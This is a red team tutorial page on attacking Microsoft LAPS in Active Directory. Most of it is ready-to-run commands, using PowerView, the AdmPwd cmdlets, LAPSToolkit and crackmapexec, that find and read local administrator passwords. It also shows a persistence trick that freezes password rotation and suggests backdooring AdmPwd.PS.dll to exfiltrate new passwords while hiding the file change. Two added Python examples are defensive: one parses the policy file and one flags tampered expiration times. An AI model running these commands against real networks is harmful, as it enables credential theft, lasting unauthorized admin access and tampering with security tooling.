LAPS

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Basic Information

LAPS (Local Administrator Password Solution) is a tool used to manage a system in which the local administrator passwords, which are unique, randomized and regularly rotated, are applied to domain-joined computers. These passwords are stored securely within Active Directory and are readable only by users who have been granted permission through Access Control Lists (ACLs). The transmission of the password from client to server is protected by Kerberos version 5 and the Advanced Encryption Standard (AES).

On the domain's computer objects, deploying LAPS results in two new attributes being added: ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTime. These attributes store the administrator password in clear text and its expiration time, respectively.

Check if enabled

reg query "HKLM\Software\Policies\Microsoft Services\AdmPwd" /v AdmPwdEnabled

dir "C:\Program Files\LAPS\CSE"
# Check if that folder exists and contains AdmPwd.dll

# Find GPOs that have "LAPS" or some other descriptive term in the name
Get-DomainGPO | ? { $_.DisplayName -like "*laps*" } | select DisplayName, Name, GPCFileSysPath | fl

# Search computer objects where the ms-Mcs-AdmPwdExpirationTime property is not null (any Domain User can read this property)
Get-DomainObject -SearchBase "LDAP://DC=sub,DC=domain,DC=local" | ? { $_."ms-mcs-admpwdexpirationtime" -ne $null } | select DnsHostname

LAPS Password Access

You can download the raw LAPS policy from \\dc\SysVol\domain\Policies\{4A8A4E8E-929F-401A-95BD-A7D40E0976C8}\Machine\Registry.pol and then use Parse-PolFile from the GPRegistryPolicyParser package to convert this file into a human-readable format.
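For readers who want to see what Parse-PolFile is doing under the hood, and to review the policy offline, here is an added example (not from the original page, and not code from GPRegistryPolicyParser) that builds a constructed Registry.pol blob, parses it according to the documented "PReg" layout ([key;value;type;size;data] entries in UTF-16LE) and then reviews the LAPS settings found under Software\Policies\Microsoft Services\AdmPwd. The value names other than AdmPwdEnabled (PasswordAgeDays, PasswordLength, PwdExpirationProtectionEnabled, AdminAccountName) are taken from the legacy LAPS administrative template; the review thresholds are this example's own assumptions, not LAPS defaults.

```python
import struct

# Registry value types needed for the LAPS policy values.
REG_SZ = 1
REG_DWORD = 4

LAPS_KEY = "Software\\Policies\\Microsoft Services\\AdmPwd"
UTF16 = "utf-16-le"


def build_pol(entries):
    """Construct a Registry.pol blob (constructed test fixture, not a real file).

    entries: iterable of (key, value_name, reg_type, raw_data_bytes).
    Layout: 'PReg' + version 1, then [key;value;type;size;data] per entry,
    with brackets/semicolons/strings as UTF-16LE and type/size as little-endian DWORDs.
    """
    out = b"PReg" + struct.pack("<I", 1)
    for key, value, rtype, data in entries:
        out += "[".encode(UTF16)
        out += (key + "\0").encode(UTF16) + ";".encode(UTF16)
        out += (value + "\0").encode(UTF16) + ";".encode(UTF16)
        out += struct.pack("<I", rtype) + ";".encode(UTF16)
        out += struct.pack("<I", len(data)) + ";".encode(UTF16)
        out += data + "]".encode(UTF16)
    return out


def _read_wstr(blob, pos):
    """Read a NUL-terminated UTF-16LE string starting at pos; return (text, next_pos)."""
    end = pos
    while blob[end:end + 2] != b"\x00\x00":
        end += 2
        if end >= len(blob):
            raise ValueError("unterminated string in Registry.pol")
    return blob[pos:end].decode(UTF16), end + 2


def _expect(blob, pos, ch):
    """Consume one UTF-16LE delimiter character or fail loudly."""
    if blob[pos:pos + 2] != ch.encode(UTF16):
        raise ValueError(f"expected {ch!r} at offset {pos}")
    return pos + 2


def decode_data(rtype, data):
    if rtype == REG_DWORD:
        return struct.unpack("<I", data)[0]
    if rtype == REG_SZ:
        return data.decode(UTF16).rstrip("\0")
    return data  # other registry types are returned raw


def parse_pol(blob):
    """Parse a Registry.pol blob into a list of (key, value, type, decoded data)."""
    if blob[:4] != b"PReg" or struct.unpack_from("<I", blob, 4)[0] != 1:
        raise ValueError("not a version-1 Registry.pol file")
    pos, entries = 8, []
    while pos < len(blob):
        pos = _expect(blob, pos, "[")
        key, pos = _read_wstr(blob, pos)
        pos = _expect(blob, pos, ";")
        value, pos = _read_wstr(blob, pos)
        pos = _expect(blob, pos, ";")
        rtype = struct.unpack_from("<I", blob, pos)[0]
        pos = _expect(blob, pos + 4, ";")
        size = struct.unpack_from("<I", blob, pos)[0]
        pos = _expect(blob, pos + 4, ";")
        data = blob[pos:pos + size]
        pos = _expect(blob, pos + size, "]")
        entries.append((key, value, rtype, decode_data(rtype, data)))
    return entries


def laps_settings(entries):
    """Return {value_name: data} for entries under the LAPS policy key only."""
    return {v: d for k, v, _, d in entries if k.lower() == LAPS_KEY.lower()}


def review_laps_policy(settings):
    """Flag settings a defender would want to look at (thresholds are assumptions)."""
    findings = []
    if settings.get("AdmPwdEnabled") != 1:
        findings.append("LAPS not enabled by this GPO")
    if settings.get("PwdExpirationProtectionEnabled", 0) != 1:
        findings.append("expiration-protection disabled: a manually extended "
                        "ms-Mcs-AdmPwdExpirationTime will be honoured")
    if settings.get("PasswordAgeDays", 30) > 30:
        findings.append("PasswordAgeDays above 30")
    if settings.get("PasswordLength", 14) < 14:
        findings.append("PasswordLength below 14")
    return findings


# Constructed sample: LAPS on, 30-day age, expiration protection left off.
SAMPLE_POL = build_pol([
    (LAPS_KEY, "AdmPwdEnabled", REG_DWORD, struct.pack("<I", 1)),
    (LAPS_KEY, "PasswordAgeDays", REG_DWORD, struct.pack("<I", 30)),
    (LAPS_KEY, "PasswordLength", REG_DWORD, struct.pack("<I", 14)),
    (LAPS_KEY, "PwdExpirationProtectionEnabled", REG_DWORD, struct.pack("<I", 0)),
    (LAPS_KEY, "AdminAccountName", REG_SZ, "lapsadm\0".encode(UTF16)),
])

if __name__ == "__main__":
    s = laps_settings(parse_pol(SAMPLE_POL))
    print(s)
    for f in review_laps_policy(s):
        print("[!]", f)
```

To run it against a real file, replace SAMPLE_POL with the bytes of the Registry.pol copied from SYSVOL; the parser does not care which GPO the file came from, so the same code reviews any LAPS policy in the domain.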

Moreover, the native LAPS PowerShell cmdlets can be used if they are installed on a machine we have access to:

Get-Command *AdmPwd*

CommandType     Name                                               Version    Source
-----------     ----                                               -------    ------
Cmdlet          Find-AdmPwdExtendedRights                          5.0.0.0    AdmPwd.PS
Cmdlet          Get-AdmPwdPassword                                 5.0.0.0    AdmPwd.PS
Cmdlet          Reset-AdmPwdPassword                               5.0.0.0    AdmPwd.PS
Cmdlet          Set-AdmPwdAuditing                                 5.0.0.0    AdmPwd.PS
Cmdlet          Set-AdmPwdComputerSelfPermission                   5.0.0.0    AdmPwd.PS
Cmdlet          Set-AdmPwdReadPasswordPermission                   5.0.0.0    AdmPwd.PS
Cmdlet          Set-AdmPwdResetPasswordPermission                  5.0.0.0    AdmPwd.PS
Cmdlet          Update-AdmPwdADSchema                              5.0.0.0    AdmPwd.PS

# List who can read LAPS password of the given OU
Find-AdmPwdExtendedRights -Identity Workstations | fl

# Read the password
Get-AdmPwdPassword -ComputerName wkstn-2 | fl

PowerView can also be used to find out who can read the password, and to read it:

# Find the principals that have ReadProperty on ms-Mcs-AdmPwd
Get-DomainObjectAcl -Identity wkstn-2 -ResolveGUIDs | ? { $_.ObjectAceType -eq "ms-Mcs-AdmPwd" -and $_.ActiveDirectoryRights -match "ReadProperty" } | select SecurityIdentifier, ActiveDirectoryRights

# Read the password
Get-DomainObject -Identity wkstn-2 -Properties ms-Mcs-AdmPwd

LAPSToolkit

The LAPSToolkit facilitates the enumeration of LAPS with several functions. One is parsing ExtendedRights for all computers with LAPS enabled. This will show groups specifically delegated to read LAPS passwords, which are often users in protected groups. An account that has joined a computer to the domain receives All Extended Rights over that host, and this right gives the account the ability to read the password. Enumeration may show a user account that can read the LAPS password on a host. This can help us target specific AD users who can read LAPS passwords.

# Get groups that can read passwords
Find-LAPSDelegatedGroups

OrgUnit                                           Delegated Groups
-------                                           ----------------
OU=Servers,DC=DOMAIN_NAME,DC=LOCAL                DOMAIN_NAME\Domain Admins
OU=Workstations,DC=DOMAIN_NAME,DC=LOCAL           DOMAIN_NAME\LAPS Admin

# Checks the rights on each computer with LAPS enabled for any groups
# with read access and users with "All Extended Rights"
Find-AdmPwdExtendedRights
ComputerName                Identity                    Reason
------------                --------                    ------
MSQL01.DOMAIN_NAME.LOCAL    DOMAIN_NAME\Domain Admins   Delegated
MSQL01.DOMAIN_NAME.LOCAL    DOMAIN_NAME\LAPS Admins     Delegated

# Get computers with LAPS enabled, expiration time and the password (if you have access)
Get-LAPSComputers
ComputerName                Password       Expiration
------------                --------       ----------
DC01.DOMAIN_NAME.LOCAL      j&gR+A(s976Rf% 12/10/2022 13:24:41

Dumping LAPS Passwords With Crackmapexec

If there is no access to PowerShell, you can abuse this privilege remotely through LDAP by using

crackmapexec ldap 10.10.10.10 -u user -p password --kdcHost 10.10.10.10 -M laps

LAPS Persistence

Expiration Date

Once admin, it is possible to obtain the password and prevent the machine from updating its password by setting the expiration date to a point in the future.

# Get expiration time
Get-DomainObject -Identity computer-21 -Properties ms-mcs-admpwdexpirationtime

# Change expiration time
## SYSTEM on the computer is required
Set-DomainObject -Identity wkstn-2 -Set @{"ms-mcs-admpwdexpirationtime"="232609935231523081"}

The password will still be reset if an admin uses the Reset-AdmPwdPassword cmdlet, or if Do not allow password expiration time longer than required by policy is enabled in the LAPS GPO.
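The expiration-freezing trick above is easy to spot from the directory side: ms-Mcs-AdmPwdExpirationTime is a FILETIME (100-ns ticks since 1601-01-01 UTC), and a value later than "now + PasswordAgeDays" cannot have been written by the LAPS client. The following is an added example (not from the original page, and not part of LAPS, LAPSToolkit or PowerView) that converts the attribute to a UTC timestamp and flags computers whose expiry is either beyond what the policy allows or already in the past (a client that has stopped rotating). The records are constructed sample data; in practice they would come from a query like the Get-DomainObject command shown earlier. The 232609935231523081 value is the one used in the persistence example above, which converts to the year 2338.

```python
from datetime import datetime, timedelta, timezone

# Windows FILETIME epoch: 100-ns ticks since 1601-01-01 UTC.
_FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(ft):
    """Convert an ms-Mcs-AdmPwdExpirationTime value (int64 FILETIME) to a UTC datetime."""
    return _FILETIME_EPOCH + timedelta(microseconds=int(ft) // 10)


def datetime_to_filetime(dt):
    """Inverse of filetime_to_datetime (used here to build sample records)."""
    delta = dt.astimezone(timezone.utc) - _FILETIME_EPOCH
    return (delta.days * 86400 + delta.seconds) * 10_000_000 + delta.microseconds * 10


def audit_expirations(records, max_age_days, now=None, slack_hours=24):
    """records: iterable of (hostname, expiration_filetime or None).

    Returns a list of (hostname, expiry_utc, reason) worth a look:
      'beyond policy' - expiry later than now + PasswordAgeDays (+ slack), which is
                        what a frozen expiration written by hand looks like
      'overdue'       - expiry already passed, so the client has not rotated
    """
    now = now or datetime.now(timezone.utc)
    limit = now + timedelta(days=max_age_days, hours=slack_hours)
    findings = []
    for host, ft in records:
        if ft is None:
            continue  # LAPS not (yet) applied to this computer
        exp = filetime_to_datetime(ft)
        if exp > limit:
            findings.append((host, exp, "beyond policy"))
        elif exp < now:
            findings.append((host, exp, "overdue"))
    return findings


# Constructed sample data, not real directory output.
NOW = datetime(2022, 12, 1, 9, 0, tzinfo=timezone.utc)
SAMPLE = [
    ("DC01.DOMAIN_NAME.LOCAL",
     datetime_to_filetime(datetime(2022, 12, 10, 13, 24, 41, tzinfo=timezone.utc))),
    ("WKSTN-2.DOMAIN_NAME.LOCAL", 232609935231523081),  # value from the persistence example
    ("WKSTN-7.DOMAIN_NAME.LOCAL",
     datetime_to_filetime(datetime(2022, 10, 1, tzinfo=timezone.utc))),
    ("NEWBOX.DOMAIN_NAME.LOCAL", None),
]

if __name__ == "__main__":
    for host, exp, why in audit_expirations(SAMPLE, max_age_days=30, now=NOW):
        print(f"{host:28} {exp:%Y-%m-%d %H:%M:%S} {why}")
```

Because any Domain User can read ms-Mcs-AdmPwdExpirationTime, this check needs no privileged account; the slack of one day absorbs clock drift and the normal gap between a rotation and the next GPO refresh.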

Backdoor

The original source code of LAPS can be found here, so it is possible to put a backdoor in the code (inside the Get-AdmPwdPassword method in Main/AdmPwd.PS/Main.cs, for example) that will somehow exfiltrate new passwords or store them somewhere.

Then, just recompile the new AdmPwd.PS.dll and upload it to the machine at C:\Tools\admpwd\Main\AdmPwd.PS\bin\Debug\AdmPwd.PS.dll (and change the modification time).
